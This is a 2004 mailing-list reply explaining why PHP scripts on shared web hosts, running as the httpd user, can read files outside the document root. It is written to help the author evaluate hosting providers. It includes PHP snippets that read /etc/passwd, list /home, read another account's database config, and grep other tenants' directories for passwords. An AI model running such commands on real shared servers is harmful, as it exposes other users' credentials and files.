[CLUE-Tech] Cracking websites

Jed S. Baer thag at frii.com
Sun Feb 22 17:27:28 MST 2004


On Sun, 22 Feb 2004 17:02:05 -0500
Angelo Bertolli <angelo at freeshell.org> wrote:

> Maybe I'm being naive, but what I don't understand is how this is much
> of a problem.  If something is world readable, then it is already
> readable by anyone.  If something is readable by "nobody" (the httpd
> user), then it is readable by the people on the net.

It's an issue because if you're doing any kind of dynamic content, you
need to be able to access and change that content from the web server
environment.

For example, I have a MySQL database I use to store various info. My PHP
script needs to connect to the database to manipulate that data. So, I
have a config file which stores the username/password combination used to
connect to the database. My script needs to read that file. My script,
since it's initiated by the httpd daemon, runs with the same permissions
as the httpd daemon.
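
Here's a minimal sketch of the arrangement (file names and credentials
are made up, not my actual setup):

    <?php
    // db_config.php -- must be readable by the httpd user, or the
    // script can't connect at all.
    $db_user = 'webapp';
    $db_pass = 'not-my-real-password';
    ?>

    <?php
    // index.php -- pulls in the credentials and connects, running
    // with the httpd daemon's permissions.
    include 'db_config.php';
    $conn = mysql_connect('localhost', $db_user, $db_pass);
    ?>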

PHP (like other scripting languages) isn't restricted from file access in
the same way that static HTTP requests are. Go to www.php.net and look at
the fopen or system functions.
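
For instance, nothing stops a hypothetical snooper script like this from
wandering outside the document root:

    <?php
    // Read a file Apache would never serve as a static request ...
    $fp = fopen('/etc/passwd', 'r');
    while (!feof($fp)) {
        echo fgets($fp, 1024);
    }
    fclose($fp);

    // ... or run an arbitrary command as the httpd user.
    system('ls -la /home');
    ?>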

There are ways, using various Apache directives, to restrict _viewing_ of
files by "plain vanilla" http requests. So not everything readable by the
httpd user is accessible via a plain http request. The problem comes up
when you essentially exit the webserver environment by invoking a
programming language.
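
To illustrate (the path here is made up): even if httpd.conf denies
direct requests for a config file, say with a "Deny from all" inside a
<Files> block, a script running on the same box reads it anyway:

    <?php
    // Apache refuses to *serve* db_config.php, but the PHP
    // interpreter, running as the httpd user, can still *read* it.
    echo implode('', file('/home/someuser/public_html/db_config.php'));
    ?>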

> This is why cgi scripts and php 
> scripts themselves are meant to be secured.  Whenever I have a file 
> which is world readable on my account, I always remember that it's world
> readable... secondly, I don't write php scripts which allow anyone to 
> execute commands on the server.  As a user of the server I have certain 
> privileges that others don't.  So just at the operating system level
> there isn't any life-or-death insecurity with this.

The question isn't what you or I would write as a well-secured CGI
program. It's what some cracker would try to do, and how to be certain
that a chosen web hosting company doesn't allow the attack.

> Also, as per your example, I think you must know exactly where the files
> are located.  I'm not sure executing ls is possible unless you know 
> where ls is.  I could be wrong, but I don't think the PHP script has a 
> PATH associated with it.

Nope, I need to know very little. As long as I know the server is a Unix
variant, I assume the existence of various commands, and try them out to
see what I get. I can easily guess that the location of the ls command is
either /bin/ls or /usr/bin/ls or something close to that.
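
A few lines of PHP are enough to probe for it (the candidate paths are
just guesses, tried until one answers):

    <?php
    // Try the likely homes of ls until one turns up.
    $candidates = array('/bin/ls', '/usr/bin/ls', '/usr/local/bin/ls');
    foreach ($candidates as $ls) {
        if (file_exists($ls)) {
            echo "found: $ls\n";
            system("$ls -la /");
            break;
        }
    }
    ?>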

Combine that with knowledge of a few common scripting packages used for
online merchant setups or content management systems, plus (once you know
you can get away with it) creative uses of grep, and the discovery process
is merely a matter of persistence.
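
Something along these lines, say, once you've found where the host puts
everyone's docroots (the path and the search term are guesses based on
common setups):

    <?php
    // Sweep other accounts' trees for likely credential files.
    system('grep -ril password /home/*/public_html 2>/dev/null');
    ?>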

> I'd be interested in anything you find out.  Do you specifically want to
> tell apache not to allow any php script to read a directory which is not
> within its own directory or subdirectories or something?

What I want is the ability to determine whether a hosting company I choose
is providing appropriate security against this sort of attack.
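
The simplest litmus test I can think of is a one-liner uploaded to the
account, to see which user scripts actually run as:

    <?php
    // If this prints "apache" or "nobody" rather than my account
    // name, scripts aren't being wrapped by suExec or the like, and
    // everything above applies.
    system('id');
    ?>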

Jim Feldman (and somebody else) mentioned the suExec environment, but it
looks to me as if that applies only to HTTP requests which fall into the
virtual hosting (*not* virtual machine hosting) category. In other words,
if my request is of the form
http://the.hostingcompany.com/~myaccountname/snooper.php, it avoids those
Apache directives. And, yes, I do know of hosting companies which allow
CGI to be invoked in that fashion. In fact, getting to your site via the
non-virtual-domain-host arrangement has been possible with every hosting
company I've used.

jed
-- 
http://s88369986.onlinehome.us/freedomsight/

... it is poor civic hygiene to install technologies that could someday
facilitate a police state. -- Bruce Schneier


